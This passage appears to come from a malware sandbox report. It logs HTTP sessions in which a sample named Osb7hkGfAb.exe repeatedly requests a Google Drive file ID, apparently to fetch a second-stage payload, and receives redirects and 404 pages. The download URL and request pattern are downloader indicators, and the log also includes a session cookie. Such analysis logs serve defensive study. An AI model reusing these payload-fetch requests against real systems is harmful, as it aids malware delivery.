                                                                        2025-01-10 15:02:26 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 35 50 74 50 6a 71 76 51 75 52 4d 69 4f 35 51 4f 4f 2d 58 34 45 77 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                                        Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="5PtPjqvQuRMiO5QOO-X4Ew">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        2192.168.2.1049780142.250.184.2384432900C:\Users\user\Desktop\Osb7hkGfAb.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        2025-01-10 15:02:36 UTC417OUTGET /uc?export=download&id=1WMDnWFYlE60XdwrcZgCL3LQ3cnIDyIL4 HTTP/1.1
                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                        Host: drive.google.com
                                                                        Cache-Control: no-cache
                                                                        Cookie: NID=520=NzMsYMa1hwFGHWXncS201MzV8PFMwSf_3qyvCmc5HJg3R3sO1qOPypewvliZYpdKZNCCmXBtsFfacvKWJvxX41yTpmywHEYlWCgQIoQ69oecTDWIRtQQMmkbltULqdlZt_oGviswB68cFN_JFfOg5AnucRBuGDMzy36q3C4c2OKHSrcU19ksRYE
                                                                        2025-01-10 15:02:37 UTC1920INHTTP/1.1 303 See Other
                                                                        Content-Type: application/binary
                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                        Pragma: no-cache
                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                        Date: Fri, 10 Jan 2025 15:02:37 GMT
                                                                        Location: https://drive.usercontent.google.com/download?id=1WMDnWFYlE60XdwrcZgCL3LQ3cnIDyIL4&export=download
                                                                        Strict-Transport-Security: max-age=31536000
                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                        Content-Security-Policy: script-src 'nonce-eMcB8AAgbYNNVjO2vedo7Q' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                        Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                        Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                        Server: ESF
                                                                        Content-Length: 0
                                                                        X-XSS-Protection: 0
                                                                        X-Frame-Options: SAMEORIGIN
                                                                        X-Content-Type-Options: nosniff
                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                        Connection: close


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        3192.168.2.1049787142.250.186.974432900C:\Users\user\Desktop\Osb7hkGfAb.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        2025-01-10 15:02:38 UTC459OUTGET /download?id=1WMDnWFYlE60XdwrcZgCL3LQ3cnIDyIL4&export=download HTTP/1.1
                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                        Cache-Control: no-cache
                                                                        Host: drive.usercontent.google.com
                                                                        Connection: Keep-Alive
                                                                        Cookie: NID=520=NzMsYMa1hwFGHWXncS201MzV8PFMwSf_3qyvCmc5HJg3R3sO1qOPypewvliZYpdKZNCCmXBtsFfacvKWJvxX41yTpmywHEYlWCgQIoQ69oecTDWIRtQQMmkbltULqdlZt_oGviswB68cFN_JFfOg5AnucRBuGDMzy36q3C4c2OKHSrcU19ksRYE
                                                                        2025-01-10 15:02:38 UTC1851INHTTP/1.1 404 Not Found
                                                                        X-GUploader-UploadID: AFIdbgT_YcjhY7Kh8rIgy5B11KQr3YrMH03o4_NQfqTWO2XcBH1-xEIvUqMcyHcVdr3gLfxg1QGM3DQ
                                                                        Content-Type: text/html; charset=utf-8
                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                        Pragma: no-cache
                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                        Date: Fri, 10 Jan 2025 15:02:38 GMT
                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                        Content-Security-Policy: script-src 'nonce-LcpPGtFaaY6oAm4ymA8TBg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                        Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                        Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                        Content-Length: 1652
                                                                        Server: UploadServer
                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                        Content-Security-Policy: sandbox allow-scripts
                                                                        Connection: close
                                                                        2025-01-10 15:02:38 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 59 56 66 78 65 45 41 34 48 4b 6a 4a 43 72 53 65 44 6a 51 39 4a 67 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                                        Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="YVfxeEA4HKjJCrSeDjQ9Jg">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        4192.168.2.1049856142.250.184.2384432900C:\Users\user\Desktop\Osb7hkGfAb.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        2025-01-10 15:02:49 UTC417OUTGET /uc?export=download&id=1WMDnWFYlE60XdwrcZgCL3LQ3cnIDyIL4 HTTP/1.1
                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                        Host: drive.google.com
                                                                        Cache-Control: no-cache
                                                                        Cookie: NID=520=NzMsYMa1hwFGHWXncS201MzV8PFMwSf_3qyvCmc5HJg3R3sO1qOPypewvliZYpdKZNCCmXBtsFfacvKWJvxX41yTpmywHEYlWCgQIoQ69oecTDWIRtQQMmkbltULqdlZt_oGviswB68cFN_JFfOg5AnucRBuGDMzy36q3C4c2OKHSrcU19ksRYE
                                                                        2025-01-10 15:02:49 UTC1920INHTTP/1.1 303 See Other
                                                                        Content-Type: application/binary
                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                        Pragma: no-cache
                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                        Date: Fri, 10 Jan 2025 15:02:49 GMT
                                                                        Location: https://drive.usercontent.google.com/download?id=1WMDnWFYlE60XdwrcZgCL3LQ3cnIDyIL4&export=download
                                                                        Strict-Transport-Security: max-age=31536000
                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                        Content-Security-Policy: script-src 'nonce-FHT5QmTJSjAKeWAkXesi1w' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                        Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                        Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                        Server: ESF
                                                                        Content-Length: 0
                                                                        X-XSS-Protection: 0
                                                                        X-Frame-Options: SAMEORIGIN
                                                                        X-Content-Type-Options: nosniff
                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                        Connection: close


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        5192.168.2.1049866142.250.186.974432900C:\Users\user\Desktop\Osb7hkGfAb.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        2025-01-10 15:02:50 UTC459OUTGET /download?id=1WMDnWFYlE60XdwrcZgCL3LQ3cnIDyIL4&export=download HTTP/1.1
                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                        Cache-Control: no-cache
                                                                        Host: drive.usercontent.google.com
                                                                        Connection: Keep-Alive
                                                                        Cookie: NID=520=NzMsYMa1hwFGHWXncS201MzV8PFMwSf_3qyvCmc5HJg3R3sO1qOPypewvliZYpdKZNCCmXBtsFfacvKWJvxX41yTpmywHEYlWCgQIoQ69oecTDWIRtQQMmkbltULqdlZt_oGviswB68cFN_JFfOg5AnucRBuGDMzy36q3C4c2OKHSrcU19ksRYE
                                                                        2025-01-10 15:02:50 UTC1851INHTTP/1.1 404 Not Found
                                                                        X-GUploader-UploadID: AFiumC62X_j2AzHGbO8sj7XjJTFZtTRtfC7f6sQRh5GaHFjevS_Yx5RDK6YGPeq1EV58JJEEb8Wf88o
                                                                        Content-Type: text/html; charset=utf-8
                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                        Pragma: no-cache
                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                        Date: Fri, 10 Jan 2025 15:02:50 GMT
                                                                        Content-Security-Policy: script-src 'nonce-jjnXb5ZA8edhQ2NKVGbbaA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                        Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                        Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                        Content-Length: 1652
                                                                        Server: UploadServer
                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                        Content-Security-Policy: sandbox allow-scripts
                                                                        Connection: close
                                                                        2025-01-10 15:02:50 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 52 53 75 33 51 4f 41 4a 76 74 74 66 67 67 47 5a 65 6e 79 36 77 51 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                                        Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="RSu3QOAJvttfggGZeny6wQ">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        6192.168.2.1049933142.250.184.2384432900C:\Users\user\Desktop\Osb7hkGfAb.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        2025-01-10 15:03:01 UTC417OUTGET /uc?export=download&id=1WMDnWFYlE60XdwrcZgCL3LQ3cnIDyIL4 HTTP/1.1
                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                        Host: drive.google.com
                                                                        Cache-Control: no-cache
                                                                        Cookie: NID=520=NzMsYMa1hwFGHWXncS201MzV8PFMwSf_3qyvCmc5HJg3R3sO1qOPypewvliZYpdKZNCCmXBtsFfacvKWJvxX41yTpmywHEYlWCgQIoQ69oecTDWIRtQQMmkbltULqdlZt_oGviswB68cFN_JFfOg5AnucRBuGDMzy36q3C4c2OKHSrcU19ksRYE
                                                                        2025-01-10 15:03:01 UTC1920INHTTP/1.1 303 See Other
                                                                        Content-Type: application/binary
                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                        Pragma: no-cache
                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                        Date: Fri, 10 Jan 2025 15:03:01 GMT
                                                                        Location: https://drive.usercontent.google.com/download?id=1WMDnWFYlE60XdwrcZgCL3LQ3cnIDyIL4&export=download
                                                                        Strict-Transport-Security: max-age=31536000
                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                        Content-Security-Policy: script-src 'nonce-qdfnFdtn4QFjMpUVBxAHbw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                        Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                        Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                        Server: ESF
                                                                        Content-Length: 0
                                                                        X-XSS-Protection: 0
                                                                        X-Frame-Options: SAMEORIGIN
                                                                        X-Content-Type-Options: nosniff
                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                        Connection: close


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        7192.168.2.1049941142.250.186.974432900C:\Users\user\Desktop\Osb7hkGfAb.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        2025-01-10 15:03:02 UTC459OUTGET /download?id=1WMDnWFYlE60XdwrcZgCL3LQ3cnIDyIL4&export=download HTTP/1.1
                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                        Cache-Control: no-cache
                                                                        Host: drive.usercontent.google.com
                                                                        Connection: Keep-Alive
                                                                        Cookie: NID=520=NzMsYMa1hwFGHWXncS201MzV8PFMwSf_3qyvCmc5HJg3R3sO1qOPypewvliZYpdKZNCCmXBtsFfacvKWJvxX41yTpmywHEYlWCgQIoQ69oecTDWIRtQQMmkbltULqdlZt_oGviswB68cFN_JFfOg5AnucRBuGDMzy36q3C4c2OKHSrcU19ksRYE
                                                                        2025-01-10 15:03:02 UTC1851INHTTP/1.1 404 Not Found
                                                                        X-GUploader-UploadID: AFiumC5C-XCaBhbKj5iBfDncOXFZhBwXDtN31UUNg5ZXZGA01I65pplHHMPAI9D4adid0IuhadaDd7Q
                                                                        Content-Type: text/html; charset=utf-8
                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                        Pragma: no-cache
                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                        Date: Fri, 10 Jan 2025 15:03:02 GMT
                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                        Content-Security-Policy: script-src 'nonce-hJq8jcQonabOgYIAYTB57Q' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                        Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                        Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                        Content-Length: 1652
                                                                        Server: UploadServer
                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                        Content-Security-Policy: sandbox allow-scripts
                                                                        Connection: close
                                                                        2025-01-10 15:03:02 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 38 66 61 76 55 51 30 6d 46 6f 41 33 70 59 7a 70 36 30 2d 6e 30 77 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                                        Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="8favUQ0mFoA3pYzp60-n0w">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        8192.168.2.1049981142.250.184.2384432900C:\Users\user\Desktop\Osb7hkGfAb.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        2025-01-10 15:03:13 UTC417OUTGET /uc?export=download&id=1WMDnWFYlE60XdwrcZgCL3LQ3cnIDyIL4 HTTP/1.1
                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                        Host: drive.google.com
                                                                        Cache-Control: no-cache
                                                                        Cookie: NID=520=NzMsYMa1hwFGHWXncS201MzV8PFMwSf_3qyvCmc5HJg3R3sO1qOPypewvliZYpdKZNCCmXBtsFfacvKWJvxX41yTpmywHEYlWCgQIoQ69oecTDWIRtQQMmkbltULqdlZt_oGviswB68cFN_JFfOg5AnucRBuGDMzy36q3C4c2OKHSrcU19ksRYE
                                                                        2025-01-10 15:03:13 UTC1920INHTTP/1.1 303 See Other
                                                                        Content-Type: application/binary
                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                        Pragma: no-cache
                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                        Date: Fri, 10 Jan 2025 15:03:13 GMT
                                                                        Location: https://drive.usercontent.google.com/download?id=1WMDnWFYlE60XdwrcZgCL3LQ3cnIDyIL4&export=download
                                                                        Strict-Transport-Security: max-age=31536000
                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                        Content-Security-Policy: script-src 'nonce-Oxr7MkhGqoIfYqsBAgvvmw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                        Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                        Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                        Server: ESF
                                                                        Content-Length: 0
                                                                        X-XSS-Protection: 0
                                                                        X-Frame-Options: SAMEORIGIN
                                                                        X-Content-Type-Options: nosniff
                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                        Connection: close


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        9192.168.2.1049982142.250.186.974432900C:\Users\user\Desktop\Osb7hkGfAb.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        2025-01-10 15:03:14 UTC459OUTGET /download?id=1WMDnWFYlE60XdwrcZgCL3LQ3cnIDyIL4&export=download HTTP/1.1
                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                        Cache-Control: no-cache
                                                                        Host: drive.usercontent.google.com
                                                                        Connection: Keep-Alive
                                                                        Cookie: NID=520=NzMsYMa1hwFGHWXncS201MzV8PFMwSf_3qyvCmc5HJg3R3sO1qOPypewvliZYpdKZNCCmXBtsFfacvKWJvxX41yTpmywHEYlWCgQIoQ69oecTDWIRtQQMmkbltULqdlZt_oGviswB68cFN_JFfOg5AnucRBuGDMzy36q3C4c2OKHSrcU19ksRYE
                                                                        2025-01-10 15:03:15 UTC1851INHTTP/1.1 404 Not Found
                                                                        X-GUploader-UploadID: AFiumC4ViZTyhzcRvA2jPbZMnMrDGnM-KBu5A7i9uc2RXwRp9rCoWr3Ewt4qgbdLaeCw5oNu3RPsAm0
                                                                        Content-Type: text/html; charset=utf-8
                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                        Pragma: no-cache
